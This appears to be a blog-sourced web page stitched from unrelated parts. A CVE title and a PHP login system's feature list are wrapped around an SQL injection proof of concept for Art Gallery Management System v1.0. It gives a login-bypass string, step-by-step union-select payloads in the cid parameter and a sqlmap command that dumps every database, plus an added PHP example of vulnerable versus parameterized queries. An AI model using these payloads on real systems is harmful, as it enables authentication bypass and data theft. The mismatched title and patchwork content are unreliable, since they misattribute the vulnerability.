CVE-2023-37771 Registration & Login User Management System

User Module

 

In the user module, users can register themselves. After registration, a user can log in with their own email ID and password.
If a user forgets their password, they can request it using their own email ID.

User Registration
User Login
Forgot Password

or bypass login with SQL injection " or 1=1 limit 1 -- -+"


Note: For Forgot Password, you have to provide your Gmail credentials in password-recovery.php. After that, the email function will work on your localhost.

Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.

Configurations:

cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*

Steps to Reproduce:

 1. Go to Sculptures via the "ART TYPE" option in the navigation bar.

 http://127.0.0.1/agms/product.php?cid=1&&artname=Sculptures

 2. On this page, inserting a single quote into the "cid" parameter breaks the query, which shows that the "cid" parameter is vulnerable to SQL injection.

 http://127.0.0.1/agms/product.php?cid=1'&&artname=Sculptures

 3. Now join the query.

 http://127.0.0.1/agms/product.php?cid=1'--+&&artname=Sculptures

 4. Now run an "order by" query to find the number of columns.

 127.0.0.1/agms/product.php?cid=1' order by 6 --+&&artname=Sculptures

 5. Inserting the payload in the "cid" parameter returns the username, database, and database version.

 127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures

 127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures

 127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures

 6. Now dump all the databases using sqlmap:

 sqlmap -u http://127.0.0.1/agms/product.php?cid=1 --dump-all --batch
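
The behaviour of the cid parameter in the steps above is what a query built by string concatenation produces. The following is an added example, not code from the application or from the original post: it puts an assumed concatenated query beside a validated, parameterized one. The table and column names are hypothetical, and in-memory SQLite (through PDO) stands in for the application's MySQL database so that it runs offline.

```php
<?php
// Added example, not the application's code. Table and column names are
// hypothetical; in-memory SQLite stands in for the app's MySQL database.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE art_product (id INTEGER, title TEXT,
    art_type TEXT, price INTEGER, medium TEXT, image TEXT)");
$pdo->exec("INSERT INTO art_product VALUES
    (1, 'Bronze Horse', '1', 900, 'Bronze', 'horse.jpg'),
    (2, 'Oil Landscape', '2', 400, 'Oil', 'land.jpg')");

// Vulnerable pattern: the request value is concatenated inside the quotes,
// so a quote in cid ends the string literal and the rest is parsed as SQL.
function products_vulnerable(PDO $pdo, string $cid): array
{
    $sql = "SELECT * FROM art_product WHERE art_type = '" . $cid . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: validate cid as a positive integer, then bind it.
function products_hardened(PDO $pdo, string $cid): array
{
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // reject anything that is not a plain category id
    }
    $stmt = $pdo->prepare('SELECT * FROM art_product WHERE art_type = :cid');
    $stmt->execute([':cid' => (string) $id]);   // sent as data, never parsed as SQL
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, the single-quote probe, and the
// six-column union shape from the steps above with constants only.
$inputs = ['1', "1'", "1' union all select 1,2,3,4,5,6 -- "];
foreach ($inputs as $cid) {
    try {
        $v = count(products_vulnerable($pdo, $cid)) . ' row(s)';
    } catch (PDOException $e) {
        $v = 'SQL error (query structure broken)';
    }
    $h = count(products_hardened($pdo, $cid)) . ' row(s)';
    printf("%-40s vulnerable: %-36s hardened: %s\n", json_encode($cid), $v, $h);
}
```

The vulnerable function returns an SQL error for the quote probe and an extra row for the union input, while the hardened function returns one row for the valid id and none for the other two.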

Admin Panel

Admin can manage all registered users. Admin can update user information and delete users.
Admin can change their own password.
Admin Login
Manage users
Edit user information
Change Password(admin)

source by pandaantech.blogspot.com

 
